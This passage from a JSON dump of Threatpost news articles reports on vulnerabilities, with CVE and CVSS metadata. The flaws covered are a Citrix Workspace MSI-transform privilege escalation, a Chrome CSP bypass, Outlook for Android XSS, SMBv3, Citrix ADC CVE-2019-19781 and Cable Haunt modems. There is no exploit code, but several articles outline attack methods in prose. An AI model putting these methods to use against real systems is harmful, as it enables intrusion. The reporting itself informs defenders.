differently.\u201d\n\nIn looking at the installer-launch code, the researchers found that the application checks the extension of the file requested for update, and if it ends with MSI, it is assumed to be a Windows Installer file. Since the MSI file is checked for a valid signature and is cross-referenced with the current catalog, attackers can\u2019t directly install arbitrary MSI files.\n\nEven though the MSI files are signed and hashed to prevent modification, one of the features supported by the Windows Installer is MSI Transforms (MST).\n\n\u201cAs the name suggests, MSI Transforms support altering or transforming the MSI database in some way prior to installation,\u201d according to Pen Test Partners. \u201cDomain administrators commonly use this feature to push out MSI files within Active Directory environments that do not always work in an unattended way when executed on their own. For example, an MST might be created that will inject a product activation code prior to installing.\u201d\n\nTo apply an MST, users would specify the path to the transform file on the command line, which merges the main MSI file with changes that are present within the MST file during the installation process.\n\nTherein lies the bug: \u201cSince we can control the arguments passed to msiexec, we can include the path to a malicious Transform but using an official, signed Citrix MSI that is present within the catalog file,\u201d researchers said.\n\nMalicious Transforms can be generated with an existing tool called [Microsoft Orca](<https://docs.microsoft.com/en-us/windows/win32/msi/orca-exe>), they added, or with a custom tool. Then, to exploit the vulnerability, attackers would place the original MSI installer and the MST onto a network share ready for the victim machine.\n\n\u201cBoth the local and remote privilege-escalation methods can only be exploited while an instance of CitrixReceiverUpdate.exe is running on the victim host as before,\u201d the researchers concluded. \u201cI think the remote vector is easier to exploit this time around since you can place both MSI and MST files on a network share under the attacker\u2019s control.\u201d\n\nCitrix Workspace for Windows users should update their apps to [the latest version](<https://www.citrix.com/downloads/workspace-app/windows/>), containing a revised patch.\n", "cvss3": {}, "published": "2020-09-22T17:20:21", "type": "threatpost", "title": "Known Citrix Workspace Bug Open to New Attack Vector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-8207"], "modified": "2020-09-22T17:20:21", "id": "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "href": "https://threatpost.com/citrix-workspace-new-attack/159459/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:21:30", "description": "A vulnerability in Google\u2019s Chromium-based browsers would allow attackers to bypass the Content Security Policy (CSP) on websites, in order to steal data and execute rogue code.\n\nThe bug ([CVE-2020-6519](<https://bugs.chromium.org/p/chromium/issues/detail?id=1064676>)) is found in Chrome, Opera and Edge, on Windows, Mac and Android \u2013 potentially affecting billions of web users, according to PerimeterX cybersecurity researcher Gal Weizman. Chrome versions 73 (March 2019) through 83 are affected (84 was released in July and fixes the issue).\n\nCSP is a web standard that\u2019s meant to thwart certain types of attacks, including cross-site scripting (XSS) and data-injection attacks. CSP allows web admins to specify the domains that a browser should consider to be valid sources of executable scripts. A CSP-compatible browser will then only execute scripts loaded in source files received from those domains.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/06145744/Threatpost_CC_webinar-269x300.png)](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\n\u201cCSP is the primary method used by website owners to enforce data-security policies to prevent malicious shadow-code executions on their website, so when browser enforcement can be bypassed, personal user data is at risk,\u201d Weizman explained, [in research](<https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/>) released on Monday.\n\nMost websites use CSP, the researcher noted, including internet giants like ESPN, Facebook, Gmail, Instagram, TikTok, WhatsApp, Wells Fargo and Zoom. Some notable names were not affected, including GitHub, Google Play Store, LinkedIn, PayPal, Twitter, Yahoo\u2019s Login Page and Yandex.\n\nTo exploit the vulnerability, an attacker first needs to gain access to the web server (through brute-forcing passwords or another method), in order to be able to modify the JavaScript code it uses. Then, the attacker could add a frame-src or child-src directive in the JavaScript to allow the injected code to load and execute it, bypassing the CSP enforcement and thus bypassing the site\u2019s policy, explained Weizman.\n\nBecause of the post-authentication aspect of the bug, it ranks as a medium-severity issue (6.5 out of 10 on the CvSS scale). However, because it affects CSP enforcement, this has vast implications,\u201d Weizman said, comparing it to having an issue with seatbelts, airbags and collision sensors.\n\n\u201c[Because of the] increased perception of safety, the damage caused in an accident when this equipment is faulty is much more severe,\u201d the researcher said. \u201cIn a similar way, website developers may allow third-party scripts to add functionality to their payment page, for example, knowing that CSP will restrict access to sensitive information. So, when CSP is broken, the risk for sites that relied on it is potentially higher than it would have been if the site never had CSP to begin with.\u201d\n\nThe vulnerability was present in Chrome browsers for more than a year before being fixed, so Weizman warned that the full implications of the bug are not yet known: \u201cIt is highly likely that we will learn of data breaches in the coming months that exploited it and resulted in the exfiltration of personally identifiable information (PII) for nefarious purposes.\u201d\n\nUsers should update their browsers to the latest versions to avoid falling victim to an exploit.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-10T19:43:46", "type": "threatpost", "title": "Google Chrome Browser Bug Exposes Billions of Users to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-6519"], "modified": "2020-08-10T19:43:46", "id": "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "href": "https://threatpost.com/google-chrome-bug-data-theft/158217/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T22:28:38", "description": "Users of the Microsoft Outlook for Android app should update their apps to avoid a range of attacks.\n\nThe bug (CVE-2019-1460) would allow an attacker to perform cross-site scripting (XSS) attacks on the affected systems and run scripts in the security context of the current user, according to Microsoft\u2019s [advisory on the bug](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1460#ID0EA>). XSS occurs when malicious parties [inject client-side scripts](<https://www.owasp.org/index.php/Cross-site_Scripting_\$XSS\$>) into web pages, which trick the unsuspecting user\u2019s browser into thinking that the script came from a trusted source.\n\nIn this case, the computing giant said that the issue exists in the way Microsoft Outlook for Android software parses specifically crafted email messages \u2013 thus, an attacker could exploit the vulnerability by sending just such an email. Czech firm Cybersecurity Help said in a [posting this week](<https://www.tenforums.com/windows-10-news/144873-cve-2019-1460-outlook-android-spoofing-vulnerability.html#post1774661>) that the problem was an \u201cImproper Neutralization of Input During Web Page Generation\u201d problem that exists due to insufficient sanitization of user-supplied data.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe adversary would need to be authenticated to the same network as the potential victim in order to carry out an attack, Microsoft said.\n\nA [write-up by Symantec](<https://www.symantec.com/security-center/vulnerabilities/writeup/110911?om_rssid=sr-advisories>) said that an attacker can exploit this issue to conduct spoofing attacks, while Cybersecurity Help added that an attacker could \u201csteal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.\u201d\n\nUsers should ensure that they have the [latest version of the app](<https://play.google.com/store/apps/details?id=com.microsoft.office.outlook>), and update it manually if they haven\u2019t received an auto-update.\n\nBeyond installing that update, Symantec also noted that mitigation includes running the software as a nonprivileged user with minimal access rights.\n\nResearcher Rafael Pablos was credited with finding the bug, which Microsoft rates as \u201cimportant\u201d in severity. It\u2019s listed as having a 5.6 out of 10 severity rating on the CVSS v.3 vulnerability rating scale.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "cvss3": {}, "published": "2019-11-21T19:15:17", "type": "threatpost", "title": "Microsoft Outlook for Android Bug Opens Door to XSS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1460", "CVE-2020-5135"], "modified": "2019-11-21T19:15:17", "id": "THREATPOST:597800CEAF4F4832B357C491661792B5", "href": "https://threatpost.com/microsoft-outlook-android-bug-xss/150528/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-10-14T22:27:36", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:25:54", "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\n[![Threatpost Webinar Promo Mobile App Security ](https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21105319/Webinar_Promo_App_Security-300x220.png)](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\nThe versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. <https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-01-21T17:19:28", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:26:25", "description": "UPDATED\n\nMultiple cable modems used by ISPs to provide broadband into homes have a critical vulnerability in their underlying reference architecture that would allow an attacker full remote control of the device. The footprint for the affected devices numbers in the hundreds of millions worldwide.\n\nDubbed \u201cCable Haunt\u201d by researchers at Lyrebirds, the bug (CVE-2019-19494) is found in cable modems across multiple vendors, including Arris, COMPAL, Netgear, Sagemcom, Technicolor and others. It originated in reference software written by Broadcom, researchers said, which has been copied by different cable-modem manufacturers and used in the devices\u2019 firmware. The bug essentially allows a buffer overflow, which could enable a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim\u2019s browser, according to the [CVE writeup](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19494>).\n\nMore specifically, \u201cthe cable modems are vulnerable to a DNS rebind attack followed by overflowing the registers and executing malicious functionality,\u201d explained the researchers, in a [technical paper](<https://cablehaunt.com/>) on the attack. \u201cThe exploit is possible due to lack of protection against DNS rebind attacks, default credentials and a programming error in the spectrum analyzer.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nLyrebirds researchers said that 200 million modems are potentially affected in Europe alone; they focused their research on European ISPs, many of which are already rolling out updates to fix the flaw. However, many of the same modems are used in North America, so Cable Haunt isn\u2019t restricted by geography. Users can check to see if they\u2019re affected using a [test script](<https://github.com/Lyrebirds/cable-haunt-vulnerability-test>) that the researchers released in tandem with the bug details.\n\nAs far as U.S. ISPs, \u201cwe are rapidly testing all our in-home broadband equipment, determining any vulnerability and the best steps to mitigate, as needed,\u201d a Cox spokesperson told Threatpost.\n\nA Charter spokesperson meanwhile told us that Charter is \u201ccurrently working with each of our vendors to determine if their equipment is vulnerable and when we could expect to see a firmware upgrade.\u201d\n\nComcast, for its part, did not return a request for comment.\n\n## The Attack\n\nIn a [proof-of-concept (PoC) exploit](<https://github.com/Lyrebirds/sagemcom-fast-3890-exploit>), researchers were able to demonstrate a two-step attack: First, they compromised the spectrum analyzer component on board a modem, which resulted in local access. The spectrum analyzer uses a websocket for communication with the graphical frontend displayed in a browser, and a server must verify the relevant request parameters added by the browser. However, \u201cbecause these parameters are never inspected by the cable modem, the websocket will accept requests made by JavaScript running in the browser regardless of origin, thereby allowing attackers to reach the endpoint,\u201d researchers explained.\n\nIn the second step, they show that a DNS rebind attack can be used to gain remote access to the compromised spectrum analyzer. [DNS rebinding](<https://www.tripwire.com/state-of-security/vert/practical-attacks-dns-rebinding/>) is a technique that turns a victim\u2019s browser into a proxy for attacking private networks.\n\n\u201cWithout this DNS rebind attack, the spectrum analyzer would only be exploitable on the local network,\u201d they wrote.\n\nThrough malicious communication with the endpoint, a buffer overflow can be exploited to gain control of the modem.\n\n\u201cThe websocket requests are given as JSON,\u201d the paper explained. \u201cThe parser which interprets this JSON request will copy the input parameters to a buffer, regardless of length, allowing values on the stack to be overwritten. Among these values are saved registers, such as the program counter and return address. With a carefully crafted message the modem can be manipulated to execute arbitrary code specified by a remote attacker.\u201d\n\nIf successfully exploited, the vulnerabilities can give attackers \u201cfull remote control over the entire unit, and all the traffic that flows through it, while being invisible for both the user and ISP,\u201d the researchers explained, adding that attackers could intercept private messages, redirect traffic, add the modems to botnets, replace their firmware and more. They could also direct the modem to ignore remote system updates, which could complicate any patching process.\n\n_**This post was updated at 11:30 a.m. ET on Jan, 14, 2020 to include statements from the top U.S. cable companies.**_\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-13T15:37:58", "type": "threatpost", "title": "'Cable Haunt' Bug Plagues Millions of Home Modems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19494", "CVE-2020-5135"], "modified": "2020-01-13T15:37:58", "id": "THREATPOST:E54A6B6E04C21B79F588B156DC5704F8", "href": "https://threatpost.com/cable-haunt-remote-code-execution/151756/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:31:10", "description": "About one in five of the 80,000 companies affected by a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway are still at risk from a trivial attack on their internal operations.\n\nIf exploited, the flaw could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code-execution. Researchers told Threatpost that other attacks are also possible, including denial-of-service (DoS) campaigns, data theft, lateral infiltration to other parts of the corporate infrastructure, and phishing.\n\nAccording to an assessment from Positive Technologies, which disclosed the software vulnerability in December (tracked as [CVE-2019-19781](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>)), 19 percent of vulnerable organizations in 158 countries have yet to patch. The U.S. originally accounted for 38 percent of all vulnerable organizations; about 21 percent of those are still running vulnerable instances of the products as of this week, PT said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively.\n\n\u201cPatching this bug should be an urgent priority for all remaining companies affected,\u201d said Mikhail Klyuchnikov, an expert at PT who discovered the flaw, speaking to Threatpost. \u201cThe critical vulnerability allows attackers to obtain direct access to the company\u2019s local network from the internet. This attack does not require access to any accounts, and therefore can be performed by any external attacker.\u201d\n\nHe added, \u201cThe flaw is really easy to exploit. It\u2019s also very reliable.\u201d[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN-1024x529.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/07094404/PT_Citrix_NewMap-EN.jpg>)\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, Klyuchnikov told Threatpost that a compromise could easily used as a foothold to move laterally across a victim organization.\n\n\u201cThe critical information about applications accessible by Citrix can be leaked,\u201d he explained. \u201cThat could possibly include information (and possibly credentials) about internal web applications, corporate applications, remote desktops and other applications available through the Citrix Gateway.\u201d\n\nAttackers also could gain the ability to read configuration files, he said; these contain sensitive information like user credentials, yet more information about the internal network and credentials for internal services (LDAP, RADIUS and so on).\n\n\u201cDepending on system settings, attackers can get administrative credentials for the Citrix Gateway, credentials (login, password, etc.) of company employees and credentials of other services used in Citrix Gateway [from the configuration files],\u201d he said.\n\nAdding insult to injury, various other kinds of attacks are possible as well.\n\n\u201c[An attacker] can conduct DoS attacks against Citrix Gateway, just deleting its critical files,\u201d the researcher explained to Threatpost. \u201cIt can lead to unavailability of the login page of Citrix application. Thus, no one (e.g. company employees) can get access into internal network using Citrix gateway. In other words, the Citrix gateway application will cease to do its main task for which it was installed.\u201d\n\nIt\u2019s also possible to conduct phishing attacks. For example, a hacker can change the login page so that the entered username and password is obtained by the attacker as clear text.\n\nAnd then there\u2019s the remote code-execution danger: \u201cAn attacker can use a compromised application as part of a botnet or for cryptocurrency mining. And of course, it can place malicious files in this application,\u201d Klyuchnikov noted.\n\nIn-the-wild attacks could be imminent: On January 8, a researcher [released an exploit](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) that allows a potential attacker to perform automated attacks. Others followed.\n\nhttps://twitter.com/GossiTheDog/status/1214892555306971138\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers last month said that the mitigation steps offered by the vendor suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\nAccording to PT, the countries with the greatest numbers of vulnerable companies are led by Brazil (43 percent of all companies where the vulnerability was originally detected), China (39 percent), Russia (35 percent), France (34 percent), Italy (33 percent) and Spain (25 percent). The USA, Great Britain, and Australia each stand at 21 percent of companies still using vulnerable devices without any protection measures.\n\nLast month, Citrix [issued patches](<https://support.citrix.com/article/CTX267027>) for several product versions to fix the issue, [ahead of schedule](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\n\u201cConsidering how long this vulnerability has been around (since the first vulnerable version of the software was released in 2014), detecting potential exploitation of this vulnerability (and, therefore, infrastructure compromise) retrospectively becomes just as important [as patching],\u201d Klyuchnikov said.\n\nHe added, \u201cI think it\u2019s easy to apply the patch, as there is already a regular update for the hardware that fixes the vulnerability. Nothing should get in the way, as there is a full update from Citrix.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-07T15:32:52", "type": "threatpost", "title": "Critical Citrix RCE Flaw Still Threatens 1,000s of Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-02-07T15:32:52", "id": "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "href": "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:47", "description": "The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet\u2019s top email server software, according to the National Security Agency (NSA).\n\nThe bug exists in the Exim Mail Transfer Agent (MTA) 